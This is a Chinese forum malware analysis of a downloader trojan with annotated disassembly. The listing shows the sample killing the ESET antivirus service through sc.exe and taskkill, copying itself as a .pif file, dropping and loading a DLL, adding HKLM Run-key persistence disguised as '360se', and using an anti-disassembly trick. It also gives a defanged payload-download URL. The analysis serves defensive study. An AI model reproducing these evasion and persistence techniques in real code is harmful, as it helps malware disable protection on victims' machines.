简单的下载者木马分析

算是第一次自己分析一个完整的木马,时间花费很长,释放的 dll 还没来得及分析,后面会跟上。好多 api 都是刚刚查过才知道。很简单大家不要吐槽啊。附件里面有 idb 和原文件,还有脱壳后的文件。欢迎大家批评指教

附件:http://bbs.pediy.com/showthread.php?p=1090998#post1090998

基本信息

  报告名称:ye.exe下载者木马分析                                                   
  作者:                                                           
  报告更新日期:2012.7.29                                                                                     

  文件名称:9648c7cc2f01d7b67718cb89a48d927e(样本文件以其哈希值命名;报告名称中称其为 ye.exe)

  文件哈希:9648c7cc2f01d7b67718cb89a48d927e(32 位十六进制,应为 MD5;原文未给出 SHA-256,核对样本时请自行计算)

  文件大小:31528字节

  创建时间:2012-04-13 02:01:37

  文件类型:EXE

  PEID信息:UPX 2.93 (LZMA) [Overlay] *                                                  
  可能受到威胁的系统:                                
  windows

详细分析/功能介绍

1.upx解压缩执行原程序

2.通过 RtlAdjustPrivilege 启用 0x14 号特权(0x14 = 20 = SeDebugPrivilege),创建互斥体 KAIFAONGQUMEIGANDE 防止重复运行

3保存自身到文件

4释放 dll 并用 LoadLibrary 加载,依次调用其导出函数 Whaier、Simenze;随后按系统版本写注册表实现自启动(dwMajorVersion >= 6 即 Vista 及以上:向 HKLM\Software\Microsoft\Windows\CurrentVersion\Run 写入值名 360se,数据为本 exe 的路径而不是 dll;更早的系统:调用 change_reg2 并传入 dll 路径,其内部未在本文列出)

5下载文件  hxxp://c[.]shidaihuabian[.]com/s.gif >> "%windir%\temp\olm.ini"(URL 已做去毒化处理;下载逻辑不在本文列出的三段反汇编中,推测位于释放的 dll,待后续分析确认)

提升进程权限,创建互斥体,跳转到主体部分

部分反汇编代码

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

; ---------------------------------------------------------------------------
; start (0x401820), first part - entry point of the unpacked ye.exe.
; Listing excerpt: the function does NOT end here. 0x401916..0x4019BB is
; omitted by the author; the rest (0x4019BB .. `start endp`) is listed
; further below.
; What this part does:
;   - RtlAdjustPrivilege wrapper: enables privilege 0x14 (= 20 =
;     SeDebugPrivilege) for the process
;   - GetModuleFileNameA -> modulepath (global, reused later by CopyFile
;     and by the HKLM Run-key value)
;   - builds stack strings one byte at a time (keeps them out of a plain
;     strings dump): "sc.exe", "open", "taskkill.exe", "ekrn.EXE"
;   - CreateMutexA("KAIFAONGQUMEIGANDE"); if GetLastError returns
;     ERROR_ALREADY_EXISTS (0xB7) a second instance closes the handle,
;     shows MessageBoxA("0") and exits
; Register roles: bl = 'e' and al = 's' / 'E' are cached byte constants
; used while storing the stack strings; esi = mutex handle.
; ---------------------------------------------------------------------------
CODE:00401820                 push    ebp
CODE:00401821                 mov     ebp, esp
CODE:00401823                 sub     esp, 174h       ; locals: path buffer + stack strings
CODE:00401829                 push    ebx
CODE:0040182A                 push    esi
CODE:0040182B                 push    1               ; bEnable = TRUE (only arg of the wrapper; privilege index is inside it)
CODE:0040182D                 call    _Rtladjustprivilege ; RtlAdjustPrivilege(0x14, TRUE, ...): 0x14 = 20 = SeDebugPrivilege, process-wide (per original note); needed later to touch ekrn.exe
CODE:00401832                 push    104h            ; nSize = MAX_PATH
CODE:00401837                 push    offset modulepath ; lpFilename (global)
CODE:0040183C                 push    0               ; hModule = NULL -> this image
CODE:0040183E                 call    _getmodulefilename ; GetModuleFileNameA: full path of the running exe
CODE:00401843                 add     esp, 10h        ; cdecl cleanup: 1 + 3 args
CODE:00401846                 mov     al, 's'
CODE:00401848                 mov     [ebp+var_10], al ; "sc.exe"[0]
CODE:0040184B                 mov     [ebp+var_42], al ; "taskkill.exe"[2]
CODE:0040184E                 push    offset Name     ; "KAIFAONGQUMEIGANDE" - lpName, single-instance mutex (IOC)
CODE:00401853                 mov     bl, 'e'         ; bl = 'e', reused for every 'e' below
CODE:00401855                 mov     al, 'E'
CODE:00401857                 push    0               ; bInitialOwner
CODE:00401859                 push    0               ; lpMutexAttributes
CODE:0040185B                 mov     [ebp+var_8], 'o' ; var_8 = "open" (lpOperation of the ShellExecute-style calls in part two)
CODE:0040185F                 mov     [ebp+var_7], 'p'
CODE:00401863                 mov     [ebp+var_6], bl ; e
CODE:00401866                 mov     [ebp+var_5], 'n'
CODE:0040186A                 mov     [ebp+var_4], 0  ; NUL -> "open"
CODE:0040186E                 mov     [ebp+var_F], 'c' ; var_10 = "sc.exe"
CODE:00401872                 mov     [ebp+var_E], '.'
CODE:00401876                 mov     [ebp+var_D], bl ; e
CODE:00401879                 mov     [ebp+var_C], 'x'
CODE:0040187D                 mov     [ebp+var_B], bl ; e
CODE:00401880                 mov     [ebp+var_A], 0  ; NUL -> "sc.exe"
CODE:00401884                 mov     [ebp+var_44], 't' ; var_44 = "taskkill.exe"
CODE:00401888                 mov     [ebp+var_43], 'a'
CODE:0040188C                 mov     [ebp+var_41], 'k'
CODE:00401890                 mov     [ebp+var_40], 'k'
CODE:00401894                 mov     [ebp+var_3F], 'i'
CODE:00401898                 mov     [ebp+var_3E], 'l'
CODE:0040189C                 mov     [ebp+var_3D], 'l'
CODE:004018A0                 mov     [ebp+var_3C], '.'
CODE:004018A4                 mov     [ebp+var_3B], bl ; e
CODE:004018A7                 mov     [ebp+var_3A], 78h ; 'x'
CODE:004018AB                 mov     [ebp+var_39], bl ; e
CODE:004018AE                 mov     [ebp+var_38], 0 ; NUL -> "taskkill.exe"
CODE:004018B2                 mov     [ebp+var_28], bl ; var_28 = "ekrn.EXE" (ESET kernel service image name)
CODE:004018B5                 mov     [ebp+var_27], 'k'
CODE:004018B9                 mov     [ebp+var_26], 'r'
CODE:004018BD                 mov     [ebp+var_25], 'n'
CODE:004018C1                 mov     [ebp+var_24], '.'
CODE:004018C5                 mov     [ebp+var_23], al ; E
CODE:004018C8                 mov     [ebp+var_22], 'X'
CODE:004018CC                 mov     [ebp+var_21], al ; E
CODE:004018CF                 mov     [ebp+var_20], 0 ; NUL -> "ekrn.EXE"
CODE:004018D3                 call    CreateMutexA    ; CreateMutexA(NULL, FALSE, "KAIFAONGQUMEIGANDE") - single-instance guard
CODE:004018D9                 mov     esi, eax        ; esi = hMutex
CODE:004018DB                 nop                     ; 5-byte nop run (size of a CALL rel32); possibly a patched-out call - unverified
CODE:004018DC                 nop
CODE:004018DD                 nop
CODE:004018DE                 nop
CODE:004018DF                 nop
CODE:004018E0                 call    GetLastError
CODE:004018E6                 cmp     eax, 0B7h       ; ERROR_ALREADY_EXISTS (183)
CODE:004018EB                 jnz     short @mainpart ; mutex was newly created -> first instance, continue with the main body
CODE:004018ED                 push    esi             ; hMutex
CODE:004018EE                 call    _closehandle    ; CloseHandle wrapper (cdecl)
CODE:004018F3                 add     esp, 4
CODE:004018F6                 nop
CODE:004018F7                 nop
CODE:004018F8                 nop
CODE:004018F9                 nop
CODE:004018FA                 push    0               ; uType
CODE:004018FC                 push    offset Caption  ; "0"
CODE:00401901                 push    offset Caption  ; "0"
CODE:00401906                 push    0FFFFFFFFh      ; hWnd
CODE:00401908                 call    MessageBoxA     ; MessageBoxA(-1, "0", "0", 0) - apparent debug leftover, visible to the user
CODE:0040190E                 push    0               ; uExitCode
CODE:00401910                 call    ExitProcess     ; second instance terminates here
CODE:00401916 ; ---------------------------------------------------------------------------

若检测到 ESET 的 ekrn.exe 正在运行,先通过 sub_4027A0 对其进行处理(三次调用的参数布局与 ShellExecuteA(NULL, "open", "sc.exe" / "taskkill.exe", 参数串, NULL, SW_HIDE) 一致,推测是停止服务并结束进程;具体参数串 var_50/var_60/var_70 在被省略的 0x401916–0x4019BB 区间构造,本文看不到);然后把自身复制到 %CommonProgramFiles%\rgdltecq\nhoifz.pif(CSIDL 0x2B = CSIDL_PROGRAM_FILES_COMMON,.pif 扩展名在 Windows 上可作为可执行文件运行),最后跳转到释放 dll 的部分

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

; ---------------------------------------------------------------------------
; start (0x401820), second part: from the ekrn.exe check to `start endp`.
; Listing excerpt: it begins mid-function. The sub_4028D0 argument and the
; var_50 / var_60 / var_70 command-line buffers are built in the omitted
; range 0x401916..0x4019BB and are not visible here.
; Summary:
;   - if ekrn.exe (ESET) is running: three sub_4027A0 calls whose six
;     arguments are laid out exactly like ShellExecuteA(NULL, "open",
;     "sc.exe" | "taskkill.exe", params, NULL, SW_HIDE) - presumably
;     stopping the service / killing the process (confirm in sub_4027A0)
;   - SHGetSpecialFolderPathA(CSIDL_PROGRAM_FILES_COMMON) + "\rgdltecq"
;     -> CreateDirectoryA; CopyFileA(self -> "...\rgdltecq\nhoifz.pif")
;   - Sleep(4 s), then loc_4015B0 (the DLL dropper, listed below)
; IOC: %CommonProgramFiles%\rgdltecq\nhoifz.pif (.pif runs as an executable
; on Windows). The MessageBoxA here looks like a debug leftover.
; ---------------------------------------------------------------------------
CODE:004019BB                 call    sub_4028D0      ; look up ekrn.exe (ESET); original note: returns its PID. Its argument is pushed in the omitted code
CODE:004019C0                 add     esp, 4
CODE:004019C3                 cmp     eax, 1
CODE:004019C6                 jbe     short loc_401A2A ; unsigned eax <= 1 -> ekrn.exe not running, skip the kill sequence
CODE:004019C8                 push    0               ; arg6 (nShowCmd = 0 = SW_HIDE if this is ShellExecuteA)
CODE:004019CA                 lea     ecx, [ebp+var_50] ; params for sc.exe (built in omitted code)
CODE:004019CD                 push    0               ; arg5 (lpDirectory)
CODE:004019CF                 lea     edx, [ebp+var_10] ; "sc.exe"
CODE:004019D2                 push    ecx             ; arg4 = var_50
CODE:004019D3                 lea     eax, [ebp+var_8] ; "open"
CODE:004019D6                 push    edx             ; arg3 = "sc.exe"
CODE:004019D7                 push    eax             ; arg2 = "open"
CODE:004019D8                 push    0               ; arg1 (hwnd)
CODE:004019DA                 call    sub_4027A0      ; ShellExecuteA-shaped call: "open" sc.exe <var_50> - presumably stops the ESET service
CODE:004019DF                 push    1F4h            ; 500 ms
CODE:004019E4                 call    _Sleep
CODE:004019E9                 push    0
CODE:004019EB                 lea     ecx, [ebp+var_60] ; params for taskkill.exe (built in omitted code)
CODE:004019EE                 push    0
CODE:004019F0                 lea     edx, [ebp+var_44] ; "taskkill.exe"
CODE:004019F3                 push    ecx
CODE:004019F4                 lea     eax, [ebp+var_8] ; "open"
CODE:004019F7                 push    edx
CODE:004019F8                 push    eax
CODE:004019F9                 push    0
CODE:004019FB                 call    sub_4027A0      ; "open" taskkill.exe <var_60>
CODE:00401A00                 push    1F4h            ; 500 ms
CODE:00401A05                 call    _Sleep
CODE:00401A0A                 nop                     ; nop padding
CODE:00401A0B                 nop
CODE:00401A0C                 nop
CODE:00401A0D                 nop
CODE:00401A0E                 nop
CODE:00401A0F                 nop
CODE:00401A10                 push    0
CODE:00401A12                 lea     ecx, [ebp+var_70] ; second params for taskkill.exe (built in omitted code)
CODE:00401A15                 push    0
CODE:00401A17                 lea     edx, [ebp+var_44] ; "taskkill.exe"
CODE:00401A1A                 push    ecx
CODE:00401A1B                 lea     eax, [ebp+var_8] ; "open"
CODE:00401A1E                 push    edx
CODE:00401A1F                 push    eax
CODE:00401A20                 push    0
CODE:00401A22                 call    sub_4027A0      ; "open" taskkill.exe <var_70>
CODE:00401A27                 add     esp, 50h        ; cdecl cleanup: 3 x 6 args + 2 Sleep args = 20 dwords
CODE:00401A2A
CODE:00401A2A loc_401A2A:                             ; CODE XREF: start+1A6j
CODE:00401A2A                 push    edi
CODE:00401A2B                 mov     ecx, 40h        ; memset(floderpath, 0, MAX_PATH): 0x40 dwords ...
CODE:00401A30                 xor     eax, eax
CODE:00401A32                 lea     edi, [ebp+var_173] ; ... starting at floderpath+1
CODE:00401A38                 mov     [ebp+floderpath], 0 ; first byte
CODE:00401A3F                 push    1               ; fCreate = TRUE for SHGetSpecialFolderPathA (pushed early, interleaved with the memset)
CODE:00401A41                 rep stosd               ; 0x100 bytes
CODE:00401A43                 stosw                   ; + 2 bytes
CODE:00401A45                 lea     ecx, [ebp+floderpath]
CODE:00401A4B                 push    2Bh             ; nFolder = 0x2B = CSIDL_PROGRAM_FILES_COMMON ("C:\Program Files\Common Files")
CODE:00401A4D                 push    ecx             ; lpszPath = floderpath
CODE:00401A4E                 push    0               ; hwndOwner = NULL
CODE:00401A50                 stosb                   ; + 1 byte -> 1 + 0x100 + 2 + 1 = 0x104 = MAX_PATH bytes zeroed in total (not 43)
CODE:00401A51                 call    _SHGetSpecialFloderPath ; SHGetSpecialFolderPathA(NULL, floderpath, CSIDL_PROGRAM_FILES_COMMON, TRUE); creates the folder if missing
CODE:00401A56                 mov     esi, lstrcat    ; esi = lstrcatA, used for all path building below
CODE:00401A5C                 add     esp, 10h        ; cdecl cleanup: 4 args
CODE:00401A5F                 lea     edx, [ebp+floderpath]
CODE:00401A65                 mov     [ebp+Caption], 'r' ; Caption buffer reused as string: "rgdltecq" (drop subfolder)
CODE:00401A69                 push    offset asc_41D8C8 ; "\\"
CODE:00401A6E                 push    edx             ; floderpath
CODE:00401A6F                 mov     [ebp+var_1B], 'g'
CODE:00401A73                 mov     [ebp+var_1A], 'd'
CODE:00401A77                 mov     [ebp+var_19], 'l'
CODE:00401A7B                 mov     [ebp+var_18], 't'
CODE:00401A7F                 mov     [ebp+var_17], bl ; e
CODE:00401A82                 mov     [ebp+var_16], 'c'
CODE:00401A86                 mov     [ebp+var_15], 'q'
CODE:00401A8A                 mov     [ebp+var_14], 0 ; NUL -> "rgdltecq"
CODE:00401A8E                 call    esi ; lstrcat - floderpath += "\"
CODE:00401A90                 lea     eax, [ebp+Caption]
CODE:00401A93                 lea     ecx, [ebp+floderpath]
CODE:00401A99                 push    eax
CODE:00401A9A                 push    ecx
CODE:00401A9B                 call    esi ; lstrcat - floderpath += "rgdltecq"
CODE:00401A9D                 lea     edx, [ebp+Caption]
CODE:00401AA0                 push    0               ; uType
CODE:00401AA2                 lea     eax, [ebp+floderpath]
CODE:00401AA8                 push    edx             ; lpCaption = "rgdltecq"
CODE:00401AA9                 push    eax             ; lpText = "<CommonFiles>\rgdltecq"
CODE:00401AAA                 push    0FFFFFFFFh      ; hWnd
CODE:00401AAC                 call    MessageBoxA     ; apparent debug leftover - announces the drop folder on screen
CODE:00401AB2                 lea     ecx, [ebp+floderpath]
CODE:00401AB8                 push    0               ; lpSecurityAttributes = NULL
CODE:00401ABA                 push    ecx             ; lpPathName
CODE:00401ABB                 call    _CreateDirectory ; CreateDirectoryA("<CommonFiles>\rgdltecq", NULL)
CODE:00401AC0                 add     esp, 8
CODE:00401AC3                 lea     edx, [ebp+floderpath]
CODE:00401AC9                 mov     [ebp+var_34], 'n' ; var_34 = "nhoifz.pif" (file name of the dropped copy)
CODE:00401ACD                 mov     [ebp+var_33], 'h'
CODE:00401AD1                 push    offset asc_41D8C8 ; "\\"
CODE:00401AD6                 push    edx
CODE:00401AD7                 mov     [ebp+var_32], 'o'
CODE:00401ADB                 mov     [ebp+var_31], 'i'
CODE:00401ADF                 mov     [ebp+var_30], 'f'
CODE:00401AE3                 mov     [ebp+var_2F], 'z'
CODE:00401AE7                 mov     [ebp+var_2E], '.'
CODE:00401AEB                 mov     [ebp+var_2D], 'p'
CODE:00401AEF                 mov     [ebp+var_2C], 'i'
CODE:00401AF3                 mov     [ebp+var_2B], 'f'
CODE:00401AF7                 mov     [ebp+var_2A], 0 ; NUL -> "nhoifz.pif"
CODE:00401AFB                 call    esi ; lstrcat - floderpath += "\"
CODE:00401AFD                 lea     eax, [ebp+var_34]
CODE:00401B00                 lea     ecx, [ebp+floderpath]
CODE:00401B06                 push    eax
CODE:00401B07                 push    ecx
CODE:00401B08                 call    esi ; lstrcat - floderpath += "nhoifz.pif"
CODE:00401B0A                 lea     edx, [ebp+floderpath] ; "<CommonFiles>\rgdltecq\nhoifz.pif"
CODE:00401B10                 push    0               ; bFailIfExists = FALSE -> overwrites an existing copy
CODE:00401B12                 push    edx             ; lpNewFileName
CODE:00401B13                 push    offset modulepath ; lpExistingFileName = own path
CODE:00401B18                 call    _copyfilename   ; CopyFileA: copy this exe to the drop path (.pif extension still executes)
CODE:00401B1D                 push    0FA0h           ; 4000 ms
CODE:00401B22                 call    _Sleep
CODE:00401B27                 add     esp, 10h        ; cdecl cleanup: 3 CopyFile args + 1 Sleep arg
CODE:00401B2A                 call    loc_4015B0      ; drop + load the embedded DLL and set persistence (listed below)
CODE:00401B2F                 pop     edi
CODE:00401B30                 pop     esi
CODE:00401B31                 mov     eax, 1          ; return 1
CODE:00401B36                 pop     ebx
CODE:00401B37                 mov     esp, ebp
CODE:00401B39                 pop     ebp
CODE:00401B3A                 retn
CODE:00401B3A start           endp
CODE:00401B3A
CODE:00401B3A ; ---------------------------------------------------------------------------

释放 dll、加载 dll,调用其导出函数 Whaier 与 Simenze,再按系统版本写注册表实现开机自启动:dwMajorVersion >= 6(Vista 及以上)时先调用 change_reg,再以 (HKLM, "Software\Microsoft\Windows\CurrentVersion\Run", "360se", modulepath) 调用 loc_4014B0(推测为写注册表值),注意写入的数据是 modulepath 即当前 exe 的路径,而不是 dll;更早的系统则调用 change_reg2 并传入 dll 路径(两个子函数的内部本文未列出)。dll 的文件名由格式串 "\\%d.DLL" 与 GetTickCount() 拼出,每次运行都不同。另外 0x4015C0 处的 jb/jnb + db 0E8h 是一个简单的反反汇编花指令。分析这一部分花费了好长时间,dll 部分等下次吧

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

; ---------------------------------------------------------------------------
; loc_4015B0 - drop the embedded DLL, load it, call two exports, persist.
; Called from start (0x401B2A). Complete function; ends at 0x401819.
; Summary:
;   - anti-disassembly stub at 0x4015C0: jb/jnb pair over a stray 0xE8
;   - path = GetSystemDirectoryA() + wsprintfA("\\%d.DLL", GetTickCount())
;     -> "%SystemRoot%\system32\<tick>.DLL" (different name on every run)
;   - @releaseDLL(path) writes the DLL; LoadLibraryA; GetProcAddress
;     "Whaier" then "Simenze", each called with a single 0 argument
;   - GetVersionExA: dwMajorVersion >= 6 (Vista+) -> @change_reg, then
;     loc_4014B0(HKLM, "Software\Microsoft\Windows\CurrentVersion\Run",
;     "360se", modulepath) - the data is the EXE path, not the DLL;
;     older Windows -> @change_reg2(dll path)
;   - Sleep(10 s), return 1
; The bodies of @releaseDLL, @change_reg, @change_reg2 and loc_4014B0 are
; not in this listing; what they do is inferred from their arguments only.
; ---------------------------------------------------------------------------
CODE:004015B0 loc_4015B0:                             ; CODE XREF: start+30Ap
CODE:004015B0                 push    ebp
CODE:004015B1                 mov     ebp, esp
CODE:004015B3                 sub     esp, 1E0h       ; locals: OSVERSIONINFOA + path buffers + name strings
CODE:004015B9                 push    ebx
CODE:004015BA                 push    esi
CODE:004015BB                 push    edi
CODE:004015BC                 nop
CODE:004015BD                 nop
CODE:004015BE                 nop
CODE:004015BF                 nop
CODE:004015C0                 jb      short loc_4015C5 ; jb + jnb to the same target = unconditional jump (opaque predicate) ...
CODE:004015C2                 jnb     short loc_4015C5 ; ... always skips the stray 0xE8 below; a linear-sweep disassembler decodes it as a CALL and desyncs
CODE:004015C2 ; ---------------------------------------------------------------------------
CODE:004015C4                 db 0E8h ; never executed - CALL opcode byte planted as anti-disassembly junk
CODE:004015C5 ; ---------------------------------------------------------------------------
CODE:004015C5
CODE:004015C5 loc_4015C5:                             ; CODE XREF: CODE:004015C0j
CODE:004015C5                                         ; CODE:004015C2j
CODE:004015C5                 mov     ecx, 40h        ; memset([ebp-14Ch], 0, MAX_PATH): 0x40 dwords ...
CODE:004015CA                 xor     eax, eax
CODE:004015CC                 lea     edi, [ebp-14Bh] ; ... starting at the second byte
CODE:004015D2                 mov     byte ptr [ebp-14Ch], 0 ; first byte
CODE:004015D9                 rep stosd               ; 0x100 bytes
CODE:004015DB                 stosw                   ; + 2 bytes
CODE:004015DD                 stosb                   ; + 1 byte -> 1 + 0x100 + 2 + 1 = 0x104 = MAX_PATH bytes zeroed (not 0x43)
CODE:004015DE                 lea     eax, [ebp-14Ch]
CODE:004015E4                 push    104h            ; uSize = MAX_PATH
CODE:004015E9                 push    eax             ; lpBuffer
CODE:004015EA                 call    _getsystemdirectory ; GetSystemDirectoryA -> "%SystemRoot%\system32"
CODE:004015EF                 xor     ecx, ecx
CODE:004015F1                 add     esp, 8
CODE:004015F4                 mov     [ebp-47h], ecx  ; zero the 8 bytes [ebp-48h..ebp-41h] that start the name buffer
CODE:004015F7                 mov     byte ptr [ebp-48h], 0
CODE:004015FB                 mov     [ebp-43h], cx
CODE:004015FF                 mov     [ebp-41h], cl
CODE:00401602                 call    GetTickCount    ; ms since boot - becomes the DLL file name
CODE:00401608                 push    eax             ; %d
CODE:00401609                 lea     edx, [ebp-48h]
CODE:0040160C                 push    offset aD_dll   ; "\\%d.DLL"
CODE:00401611                 push    edx             ; output buffer
CODE:00401612                 call    wsprintfA       ; -> "\<tick>.DLL"; the name changes every run (the earlier "systemruntime.dll" note does not match this format string)
CODE:00401618                 lea     edi, [ebp-48h]  ; inline strlen of the name
CODE:0040161B                 or      ecx, 0FFFFFFFFh
CODE:0040161E                 xor     eax, eax        ; scan for NUL (eax stays 0 and doubles as uType below)
CODE:00401620                 add     esp, 0Ch        ; wsprintfA is cdecl: 3 args
CODE:00401623                 repne scasb
CODE:00401625                 not     ecx             ; ecx = strlen + 1 (incl. NUL)
CODE:00401627                 sub     edi, ecx        ; edi -> start of the name again
CODE:00401629                 lea     edx, [ebp-14Ch]
CODE:0040162F                 mov     esi, edi        ; esi = source "\<tick>.DLL"
CODE:00401631                 mov     ebx, ecx        ; ebx = bytes to copy
CODE:00401633                 mov     edi, edx        ; edi = system dir string
CODE:00401635                 or      ecx, 0FFFFFFFFh
CODE:00401638                 repne scasb             ; find its terminator
CODE:0040163A                 mov     ecx, ebx
CODE:0040163C                 dec     edi             ; back onto the NUL -> this is an inline strcat
CODE:0040163D                 shr     ecx, 2
CODE:00401640                 rep movsd               ; copy whole dwords
CODE:00401642                 push    eax             ; uType = 0 (MessageBoxA args interleaved with the copy)
CODE:00401643                 mov     ecx, ebx
CODE:00401645                 lea     eax, [ebp-14Ch] ; "%SystemRoot%\system32\<tick>.DLL"
CODE:0040164B                 and     ecx, 3
CODE:0040164E                 push    eax             ; lpCaption = dll path
CODE:0040164F                 push    offset a1       ; "1" - lpText
CODE:00401654                 rep movsb               ; copy the remaining 0-3 bytes (incl. NUL)
CODE:00401656                 push    0FFFFFFFFh      ; hWnd
CODE:00401658                 call    MessageBoxA     ; MessageBoxA(-1, "1", dll_path, 0) - apparent debug leftover
CODE:0040165E                 lea     ecx, [ebp-14Ch]
CODE:00401664                 push    ecx             ; dll path
CODE:00401665                 call    @releaseDLL     ; writes the embedded DLL to that path (body not listed); returns BOOL in al
CODE:0040166A                 add     esp, 4
CODE:0040166D                 test    al, al
CODE:0040166F                 jz      loc_401803      ; drop failed -> skip to the final Sleep / return
CODE:00401675                 push    1388h           ; 5000 ms
CODE:0040167A                 call    _Sleep
CODE:0040167F                 add     esp, 4
CODE:00401682                 lea     edx, [ebp-14Ch]
CODE:00401688                 push    edx             ; dll path
CODE:00401689                 call    LoadLibraryA    ; map the dropped DLL into this process (its DllMain runs here)
CODE:0040168F                 mov     esi, eax        ; esi = hModule
CODE:00401691                 test    esi, esi
CODE:00401693                 jz      loc_401803      ; load failed -> exit
CODE:00401699                 mov     edi, GetProcAddress
CODE:0040169F                 lea     eax, [ebp-8]    ; export-name buffer
CODE:004016A2                 mov     bl, 'r'         ; bl = 'r', reused below (also in the Run-key string)
CODE:004016A4                 push    eax             ; lpProcName
CODE:004016A5                 push    esi             ; hModule
CODE:004016A6                 mov     byte ptr [ebp-8], 'W' ; "Whaier" (capital W)
CODE:004016AA                 mov     byte ptr [ebp-7], 'h'
CODE:004016AE                 mov     byte ptr [ebp-6], 'a'
CODE:004016B2                 mov     byte ptr [ebp-5], 'i'
CODE:004016B6                 mov     byte ptr [ebp-4], 'e'
CODE:004016BA                 mov     [ebp-3], bl     ; r
CODE:004016BD                 mov     byte ptr [ebp-2], 0 ; NUL -> "Whaier"
CODE:004016C1                 call    edi ; GetProcAddress ; resolve export "Whaier" of the dropped DLL
CODE:004016C3                 push    0               ; single argument
CODE:004016C5                 call    eax             ; Whaier(0) - body is in the DLL, not analysed here
CODE:004016C7                 push    1388h           ; 5000 ms
CODE:004016CC                 call    _Sleep
CODE:004016D1                 add     esp, 8          ; Whaier arg + Sleep arg: the export is caller-clean (cdecl)
CODE:004016D4                 lea     ecx, [ebp-10h]
CODE:004016D7                 mov     byte ptr [ebp-10h], 'S' ; "Simenze"
CODE:004016DB                 mov     byte ptr [ebp-0Fh], 'i'
CODE:004016DF                 push    ecx             ; lpProcName
CODE:004016E0                 push    esi             ; hModule
CODE:004016E1                 mov     byte ptr [ebp-0Eh], 'm'
CODE:004016E5                 mov     byte ptr [ebp-0Dh], 'e'
CODE:004016E9                 mov     byte ptr [ebp-0Ch], 'n'
CODE:004016ED                 mov     byte ptr [ebp-0Bh], 'z'
CODE:004016F1                 mov     byte ptr [ebp-0Ah], 'e'
CODE:004016F5                 mov     byte ptr [ebp-9], 0 ; NUL -> "Simenze"
CODE:004016F9                 call    edi ; GetProcAddress ; resolve export "Simenze"
CODE:004016FB                 push    0               ; single argument
CODE:004016FD                 call    eax             ; Simenze(0)
CODE:004016FF                 add     esp, 4
CODE:00401702                 lea     edx, [ebp-1E0h] ; OSVERSIONINFOA
CODE:00401708                 mov     dword ptr [ebp-1E0h], 94h ; dwOSVersionInfoSize = sizeof(OSVERSIONINFOA) = 148
CODE:00401712                 push    edx
CODE:00401713                 call    GetVersionExA
CODE:00401719                 cmp     dword ptr [ebp-1DCh], 6 ; dwMajorVersion (offset +4)
CODE:00401720                 jnb     short loc_401736 ; >= 6 -> Windows Vista or later (not "98+"); otherwise the pre-Vista path below
CODE:00401722                 lea     eax, [ebp-14Ch]
CODE:00401728                 push    eax             ; dll path
CODE:00401729                 call    @change_reg2    ; pre-Vista persistence, takes the DLL path (body not listed)
CODE:0040172E                 add     esp, 4
CODE:00401731                 jmp     loc_401803
CODE:00401736 ; ---------------------------------------------------------------------------
CODE:00401736
CODE:00401736 loc_401736:                             ; CODE XREF: CODE:00401720j
CODE:00401736                 call    @change_reg     ; body not listed; original note says it edits the registry to "raise privileges" - unverified here
CODE:0040173B                 mov     cl, '\'         ; cl = '\' separator, stored at four key-path positions
CODE:0040173D                 push    offset modulepath ; value data = path of this exe (NOT the DLL)
CODE:00401742                 mov     [ebp-38h], cl
CODE:00401745                 mov     [ebp-2Eh], cl
CODE:00401748                 mov     [ebp-26h], cl
CODE:0040174B                 mov     [ebp-17h], cl
CODE:0040174E                 lea     ecx, [ebp-40h]  ; key path buffer
CODE:00401751                 push    offset a360se   ; "360se" - value name, mimics 360 Safe Browser (360se.exe)
CODE:00401756                 mov     al, 'o'
CODE:00401758                 mov     dl, 's'
CODE:0040175A                 push    ecx             ; lpSubKey = "Software\Microsoft\Windows\CurrentVersion\Run"
CODE:0040175B                 push    80000002h       ; HKEY_LOCAL_MACHINE -> machine-wide autorun
CODE:00401760                 mov     byte ptr [ebp-40h], 'S' ; build "Software\Microsoft\Windows\CurrentVersion\Run" on the stack
CODE:00401764                 mov     [ebp-3Fh], al   ; o
CODE:00401767                 mov     byte ptr [ebp-3Eh], 'f'
CODE:0040176B                 mov     byte ptr [ebp-3Dh], 't'
CODE:0040176F                 mov     byte ptr [ebp-3Ch], 'w'
CODE:00401773                 mov     byte ptr [ebp-3Bh], 'a'
CODE:00401777                 mov     [ebp-3Ah], bl   ; r
CODE:0040177A                 mov     byte ptr [ebp-39h], 'e'
CODE:0040177E                 mov     byte ptr [ebp-37h], 'M'
CODE:00401782                 mov     byte ptr [ebp-36h], 'i'
CODE:00401786                 mov     byte ptr [ebp-35h], 'c'
CODE:0040178A                 mov     [ebp-34h], bl   ; r
CODE:0040178D                 mov     [ebp-33h], al   ; o
CODE:00401790                 mov     [ebp-32h], dl   ; s
CODE:00401793                 mov     [ebp-31h], al   ; o
CODE:00401796                 mov     byte ptr [ebp-30h], 'f'
CODE:0040179A                 mov     byte ptr [ebp-2Fh], 't'
CODE:0040179E                 mov     byte ptr [ebp-2Dh], 'W'
CODE:004017A2                 mov     byte ptr [ebp-2Ch], 'i'
CODE:004017A6                 mov     byte ptr [ebp-2Bh], 'n'
CODE:004017AA                 mov     byte ptr [ebp-2Ah], 'd'
CODE:004017AE                 mov     [ebp-29h], al   ; o
CODE:004017B1                 mov     byte ptr [ebp-28h], 'w'
CODE:004017B5                 mov     [ebp-27h], dl   ; s
CODE:004017B8                 mov     byte ptr [ebp-25h], 'C'
CODE:004017BC                 mov     byte ptr [ebp-24h], 'u'
CODE:004017C0                 mov     [ebp-23h], bl   ; r
CODE:004017C3                 mov     [ebp-22h], bl   ; r
CODE:004017C6                 mov     byte ptr [ebp-21h], 'e'
CODE:004017CA                 mov     byte ptr [ebp-20h], 'n'
CODE:004017CE                 mov     byte ptr [ebp-1Fh], 't'
CODE:004017D2                 mov     byte ptr [ebp-1Eh], 'V'
CODE:004017D6                 mov     byte ptr [ebp-1Dh], 'e'
CODE:004017DA                 mov     [ebp-1Ch], bl   ; r
CODE:004017DD                 mov     [ebp-1Bh], dl   ; s
CODE:004017E0                 mov     byte ptr [ebp-1Ah], 'i'
CODE:004017E4                 mov     [ebp-19h], al   ; o
CODE:004017E7                 mov     byte ptr [ebp-18h], 'n'
CODE:004017EB                 mov     byte ptr [ebp-16h], 'R'
CODE:004017EF                 mov     byte ptr [ebp-15h], 'u'
CODE:004017F3                 mov     byte ptr [ebp-14h], 'n'
CODE:004017F7                 mov     byte ptr [ebp-13h], 0 ; NUL -> "...\CurrentVersion\Run"
